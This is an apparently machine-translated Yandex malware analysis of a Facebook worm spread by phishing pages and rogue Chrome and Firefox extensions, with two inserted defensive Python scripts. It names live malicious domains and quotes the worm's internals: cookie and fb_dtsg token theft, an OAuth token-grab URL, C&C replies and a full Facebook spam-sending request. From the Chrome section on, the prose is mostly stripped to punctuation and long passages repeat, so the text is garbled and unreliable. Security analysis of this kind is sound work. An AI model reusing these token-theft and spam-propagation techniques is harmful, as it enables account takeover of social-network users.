
Yandex investigation: full disclosure about the virus on Facebook

In mid-December, a mass infection of users could be observed in the Russian segment of Facebook. The "virus" spread through spam private messages and posts containing links to an allegedly private video.

According to media reports, Facebook coped with the threat and blocked the spread of the malicious messages. However, we later found that a number of malicious links were still spreading, and decided to work out how the attack operates in order to protect Yandex.Browser users from it.

The media reported that the culprit was the malicious YouTurn extension for the Chrome browser, which the user was asked to install after following a link received from an infected friend. We found, however, that several extensions were used in this campaign. YouTurn, incidentally, was removed from the Chrome Web Store on December 16.

They were all identical, but were distributed under different names and at different times through phishing pages that imitated Facebook and were hosted on Amazon S3. Interestingly, besides the distribution mechanism, they loaded advertising banners with dubious content into every browser tab and granted an internal application with a certain ID access to the infected user's account; Facebook blocked that application as well.

So, was this "virus" really so harmless, and what was new about it?

Analysis of the spread of malware


In all cases the malicious link was generated with one of several URL-shortening services. On following it, the user was sent along a chain of server-side redirects, for example:

goo.gl/rlzp52 -> dl.dropbox.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741?MYBn8KdpVhlnHNc0drEE -> dl.dropboxusercontent.com/s/xw7h4fc427avpp5/rwqhebhjwqbehjqwhje_3_2_4.htm?445694741%3FMYBn8KdpVhlnHNc0drEE=

The endpoint was a web page on dropboxusercontent.com. It contained very simple JS scripts whose main job was to inspect the browser's navigator object and redirect depending on its value. Mobile users and IE users were redirected to the teladea.blogspot.com page, which contained a parody video of the film "Friday the 13th" and a link to the Red Cross website.



Firefox users were redirected by the script to video51828.s3-website-us-west-2.amazonaws.com/mf39.html, and those following the link in Chrome were taken to video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html, while a client with the substring "Facebook-bot" in navigator was redirected to Google.
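A way to surface this kind of visitor-dependent redirection from the analyst's side, added here as example code (not from the Yandex write-up): the chain is probed once per browser identity and the final destinations are compared. The throw-away server is a constructed stand-in for the shortener -> Dropbox -> S3 chain; it branches on the User-Agent header so the demo runs offline, whereas the real landing page branched in client-side JS on navigator, which only a headless browser would see. All hostnames are constructed placeholders except the page's own "Facebook-bot" -> Google rule.

```python
"""Probe a redirect chain under several User-Agent strings and flag cloaking.

Added example, not code from the Yandex write-up. The server below is a
constructed stand-in for the redirect chain the post describes; it decides on
the User-Agent header so the demo runs offline (the real page decided in JS).
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urljoin, urlsplit

# Constructed final destinations, one per branch described in the post.
FINAL = {
    "mobile_or_ie": "http://blog.example/parody-video",
    "firefox":      "http://s3.example/mf39.html",
    "chrome":       "http://s3.example/jqnwrjkq/index.html",
    "crawler":      "https://www.google.com/",
}

def classify(user_agent):
    """Reproduce the landing page's branching on the navigator string."""
    if "Facebook-bot" in user_agent:
        return "crawler"                     # link-preview crawler is sent to Google
    if "Mobile" in user_agent or "MSIE" in user_agent or "Trident" in user_agent:
        return "mobile_or_ie"
    if "Firefox" in user_agent:
        return "firefox"
    return "chrome"

class _Cloaker(BaseHTTPRequestHandler):
    """Two-hop cloaking chain: /short -> /landing -> UA-dependent destination."""
    def do_GET(self):
        if self.path == "/short":
            self._redirect("/landing")
        elif self.path == "/landing":
            self._redirect(FINAL[classify(self.headers.get("User-Agent", ""))])
        else:
            self.send_response(404)
            self.end_headers()

    def _redirect(self, target):
        self.send_response(302)
        self.send_header("Location", target)
        self.end_headers()

    def log_message(self, *args):            # keep the demo output quiet
        pass

def follow(start_url, user_agent, max_hops=10):
    """Walk 3xx hops manually; record but never fetch an off-host destination."""
    hops = [start_url]
    url = start_url
    for _ in range(max_hops):
        parts = urlsplit(url)
        conn = http.client.HTTPConnection(parts.hostname, parts.port, timeout=5)
        conn.request("GET", parts.path or "/", headers={"User-Agent": user_agent})
        resp = conn.getresponse()
        location = resp.getheader("Location")
        resp.read()
        conn.close()
        if resp.status not in (301, 302, 303, 307, 308) or not location:
            break
        url = urljoin(url, location)
        hops.append(url)
        if urlsplit(url).netloc != urlsplit(start_url).netloc:
            break                            # left the analysed host: stop here
    return hops

PROBE_AGENTS = {                             # constructed probe identities
    "chrome":     "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/39.0 Safari/537.36",
    "firefox":    "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0",
    "ie":         "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
    "android":    "Mozilla/5.0 (Linux; Android 4.4; Mobile) AppleWebKit/537.36 Chrome/39.0",
    "fb_crawler": "Facebook-bot/1.0",
}

def probe(start_url):
    """Follow the chain once per probe identity."""
    return {name: follow(start_url, ua) for name, ua in PROBE_AGENTS.items()}

def cloaking_report(chains):
    """Cloaking = different identities end at different final URLs."""
    finals = {name: chain[-1] for name, chain in chains.items()}
    distinct = len(set(finals.values()))
    return {"verdict": "cloaking" if distinct > 1 else "consistent",
            "distinct_endpoints": distinct, "finals": finals}

def start_server():
    """Start the constructed cloaking server on an ephemeral local port."""
    server = HTTPServer(("127.0.0.1", 0), _Cloaker)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_port}/short"

if __name__ == "__main__":
    server, url = start_server()
    report = cloaking_report(probe(url))
    server.shutdown()
    for name, final in report["finals"].items():
        print(f"{name:10} -> {final}")
    print("verdict:", report["verdict"])
```

Against a real chain, point probe() at the shortener URL and drop the local server; the off-host stop in follow() keeps the probe from fetching the final payload host.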


Landing-page code

The web page for Firefox users (video51828.s3-website-us-west-2.amazonaws.com/mf49.html) was disguised as YouTube (its content was generated mainly via JS). If a user arrived from an Android mobile device, they were redirected to the s.html page, which was no longer available at the time of the analysis. In a desktop browser the page showed, instead of the video, a message that FlashPlayer needs to be updated in order to watch it. The full code can be seen here.



When the "update Player" button was clicked, the PremiumCodec extension was installed into Firefox, downloaded from premiumd1.mzzhost.com/premiumD.xpi. Interestingly, Firefox requires an additional permission to install an extension, but the attackers took this into account: after the update button was pressed, JS code drew an extra image with a pointer showing where to click in order to allow the installation.



The extension itself was installed by executing the code:

top["location"] = "premiumd1.mzzhost.com/premiumD.xpi";


An obfuscated JS script located directly on the page was responsible for this functionality.


Fragment of deobfuscated extension installation code in FireFox

The extension analysis is presented below in the corresponding section of the post.

The web page for Chrome users (http://video51828.s3-website-us-west-2.amazonaws.com/jqnwrjkq/index.html) was also a phishing page and tried to impersonate Facebook. Its contents were likewise generated with JavaScript.



The full page code can be found here.

When the video area was clicked, the user was told that the player could not be found and was asked to install a special browser extension to make up for this annoying flaw. In our case it was the YouTube Now extension (id akmghomonnhljmlfemmifjblglkacfhg), which was installed from the Chrome Web Store through the chrome.webstore.install JS mechanism.


Fragment of deobfuscated extension installation script


App page in the Chrome Web Store

The site listed as the extension's source was the same Amazon S3 address from which it was distributed.

Firefox extension analysis


The extension consisted of several files and was built on the Crossbrowser.com platform, but its functionality was very simple: it injected the script adeaditi.info/kmain.js into every open browser tab by adding a new tag to head. kmain.js - , . Facebook , , adeaditi.info/kmain.js - . , Firefox Facebook- .


PremiumCodec


adeaditi.info/kmain.js

Chrome
: icon128.png, manifest.json main.js. , YouTube, "contextMenus" permissions. , :

"content_security_policy": "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'" ,

, CSP https bmw5done.info.
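A triage check for exactly this manifest pattern, added here as example code (not the extension's or the article's): it parses content_security_policy and the permissions list and flags 'unsafe-eval', remote script origins such as bmw5done.info, and broad host permissions. The sample manifest is constructed; only its CSP string is the one quoted above, and its permissions list is an assumption.

```python
"""Triage a Chrome extension manifest for CSP and permission red flags.

Added example, not code from the Yandex write-up or from the extension. The
sample manifest is constructed; only its content_security_policy string is the
one quoted in the post, and the permissions list is an assumption.
"""
import json

# Constructed manifest carrying the CSP quoted in the post.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "YouTube Now",
    "version": "1.0",
    "permissions": ["contextMenus", "tabs", "<all_urls>"],
    "background": {"scripts": ["main.js"]},
    "content_security_policy":
        "script-src 'self' 'unsafe-eval' bmw5done.info; object-src 'self' 'unsafe-eval'",
})

# Constructed benign manifest that keeps the platform default policy.
CLEAN_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "benign",
    "version": "1.0",
    "permissions": ["contextMenus"],
    "content_security_policy": "script-src 'self'; object-src 'self'",
})

RISKY_PERMISSIONS = {"<all_urls>", "tabs", "webRequest", "webRequestBlocking",
                     "cookies", "history", "proxy", "debugger"}
SEVERITY_ORDER = ["clean", "info", "medium", "high"]

def parse_csp(policy):
    """Map each CSP directive name to its list of source expressions."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives

def classify_source(src):
    """'keyword' | 'extension' | 'scheme' | 'host' for one source expression."""
    s = src.lower()
    if s.startswith("'"):
        return "keyword"
    if s.startswith("chrome-extension:"):
        return "extension"
    if s.endswith(":"):
        return "scheme"
    return "host"

def triage(manifest_text):
    """Return (severity, message) findings for one manifest.json document."""
    manifest = json.loads(manifest_text)
    findings = []
    csp = manifest.get("content_security_policy")
    if isinstance(csp, dict):                # MV3 nests the policy per context
        csp = csp.get("extension_pages", "")
    if not csp:
        findings.append(("info", "no content_security_policy; platform default applies"))
    else:
        for directive, sources in parse_csp(csp).items():
            if "'unsafe-eval'" in sources:
                findings.append(("high", f"{directive} allows 'unsafe-eval': "
                                         "downloaded text can be executed with eval()"))
            if "'unsafe-inline'" in sources:
                findings.append(("high", f"{directive} allows 'unsafe-inline'"))
            for src in sources:
                kind = classify_source(src)
                if kind == "host":
                    findings.append(("high", f"{directive} trusts remote origin {src}: "
                                             "its code can change without a store update"))
                elif kind == "scheme":
                    findings.append(("medium", f"{directive} trusts every {src} origin"))
    for perm in manifest.get("permissions", []):
        if perm in RISKY_PERMISSIONS or perm.endswith("://*/*"):
            findings.append(("medium", f"broad permission {perm}"))
    return findings

def worst(findings):
    """Highest severity present, or 'clean' when there are no findings."""
    return max((sev for sev, _ in findings), key=SEVERITY_ORDER.index, default="clean")

if __name__ == "__main__":
    for sev, msg in triage(SAMPLE_MANIFEST):
        print(f"[{sev}] {msg}")
```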

main.js


main.js

, document.write(“https://bmw5done.info/indonesia/ld.js”) .

ld.js, . box, ajax- :

bmw5done.info/qbrweq.js?187630.24409614317

json, uri, cmd. json , , cmd . , .

ld.js localStorage ran_before, , , 1, facebook.com.


ld.js

callback- . , url “devtools://”, , ajax- bmw5done.info/qbrweq.js? , chrome.tabs.executeScript. callback , URL : “chrome://chrome/extensions” , “opera://extensions”, “chrome://extensions/”.

qbrweq.js? , Facebook-, .

, URL “www.facebook.com”, , . , uiToggle wrap, uiPopover. _5ce . , . , , Facebook .


qbrweq.js,

ajax- facebook.com, document.cookie , ANTI-CSRF- “fb_dtsg” uid . , .



URL bmw5done.info/apostime.php — php- C&C . , , json, : link type. :

{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "type": "aktiv" }.
link, «?», 20 , ajax- www.googleapis.com/urlshortener/v1/url . localStorage “fb_postlink”. .

ajax-api graph.facebook.com . facebook.com/ajax/typeahead/place_tag_friends.php json . json , friends_fields, 20 :

“&composertags_with[19]=<id_ >" .


20

veri, friends_fields.

, msjrandom. json, C&C, 'aktiv' 1, post_add(). “ ” + “Private Video” msjrandom, "fb_postlink". , ( veri). .

, Like, , . , , .

:

uygulamaizinver(TokenUrl("517220311745087"));

, Facebook- Facebook- id 517220311745087. TokenUrl() url -:

www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=517220311745087&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday



uygulamaizinver() ajax-, html, , action . duzenlevegonder() , , , duzenlevegonder() .



Facebook , , . . .

, facebook.com, , babasker() , bmw5done.info/ag.php . php-, C&C, , API Facebook. json :

{ "link": "https://dl.dropbox.com/s/o2yzr7kfewaqc1o/sa7d89as987d78a9d89s_2_2_2.htm?1241705463", "base": "facebook.com", "okan": , "foto1": "https://graph.facebook.com/", "foto2": "/picture?type=large&width=150&height=150", "titulli": , "friends": "jo", "friendname": "jo", "type": "aktiv","web": "po" }

“type” aktiv, ajax- www.googleapis.com/urlshortener/v1 , , C&C “link”, localStorage "fb_postlink", , . qwecek() , C&C json.

AJAX-API Facebook facebook.com/ajax/chat/buddy_list.php?__a=1
id , Facebook-, configList. 20 id . c json benimesaj() , :

message_batch[0][action_type]=ma-type%3Auser-generated-message&message_batch[0][author]=fbid%3A<id__>&message_batch[0][author_email]&message_batch[0][coordinates]&message_batch[0][timestamp_time_passed]=0&message_batch[0][is_unread]=false&message_batch[0][is_cleared]=false&message_batch[0][is_forward]=false&message_batch[0][is_filtered_content]=false&message_batch[0][is_spoof_warning]=false&message_batch[0][source]=source%3Achat%3Aweb&message_batch[0][source_tags][0]=source%3Achat&message_batch[0][body]= &message_batch[0][has_attachment]=true&message_batch[0][html_body]=false&&message_batch[0][specific_to_list][0]=fbid%3A<id__online>&message_batch[0][specific_to_list][1]=fbid%3A<id__>&message_batch[0][content_attachment][subject]=IP6%20Short%20URL%20-%20Free%20service&message_batch[0][content_attachment][app_id]=2309869772&message_batch[0][content_attachment][attachment][params][urlInfo][canonical]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][final]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][urlInfo][user]=<fb_post_link>&message_batch[0][content_attachment][attachment][params][favicon]=&message_batch[0][content_attachment][attachment][params][title]=<__online>jo&message_batch[0][content_attachment][attachment][params][summary]=youtube.com&message_batch[0][content_attachment][attachment][params][images][0]=https://graph.facebook.com/<id__online>/picture?type=large&width=150&height=150&message_batch[0][content_attachment][attachm...k_
metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.

API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .


id

localStorage okanxxxxss2 + 11e4, babasker() .

, Firefox. , .



, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .


Chrome, , - :

. ; - , .

, , .. , , - . , , , , - .

, , C&C , , , adeaditi.info
cracks4free.info.

:

support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing

, . , , , 2011 .

, - . Facebook . , .

SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .

metrics][images_pending]=0&message_batch[0][content_attachment][link_metrics][images_fetched]=0&message_batch[0][content_attachment][link_metrics][image_dimensions][0]=626&message_batch[0][content_attachment][link_metrics][image_dimensions][1]=293&message_batch[0][content_attachment][link_metrics][images_selected]=1&message_batch[0][content_attachment][link_metrics][images_considered]=1&message_batch[0][content_attachment][link_metrics][images_cap]=3&message_batch[0][content_attachment][link_metrics][images_type]=ranked&message_batch[0][content_attachment][composer_metrics][best_image_w]=100&message_batch[0][content_attachment][composer_metrics][best_image_h]=100&message_batch[0][content_attachment][composer_metrics][image_selected]=0&message_batch[0][content_attachment][composer_metrics][images_provided]=1&message_batch[0][content_attachment][composer_metrics][images_loaded]=1&message_batch[0][content_attachment][composer_metrics][images_shown]=1&message_batch[0][content_attachment][composer_metrics][load_duration]=4&message_batch[0][content_attachment][composer_metrics][timed_out]=0&message_batch[0][content_attachment][composer_metrics][sort_order]=&message_batch[0][content_attachment][composer_metrics][selector_type]=UIThumbPager_6&message_batch[0][ui_push_phase]=V3&message_batch[0][status]=0&client=mercury&__user=AAA&__a=1&__dyn=7n8anEAMCBynzpQ9UoGya4Cq74qbx2mbAKGiyGGEZ9LFDxCm6p_AyoSnx2&__req=f&fb_dtsg=100004008835111&ttstamp=2658172571218810680459011989&__rev=1300533
.

API facebook.com /ajax/mercury/send_messages.php?__a=1 , , .


id

localStorage okanxxxxss2 + 11e4, babasker() .

, Firefox. , .



, chrome.tabs.executeScript CSP-, //superfish.com, //ads.panoramtech.net srv1.clk-analytics.com head , CSP . , , CSP facebook.com. , . img-src object-src, facebook.com CSP .


Chrome, , - :

. ; - , .

, , .. , , - . , , , , - .

, , C&C , , , adeaditi.info
cracks4free.info.

:

support.mozilla.org/ru/questions/959873
stackoverflow.com/questions/17982902/prevent-malware-javascript-from-executing

, . , , , 2011 .

, - . Facebook . , .

SBAPI DNS, . , , , . , CSP , , img-src object-src, , , , .
Source: https://habr.com/ru/post/248225/
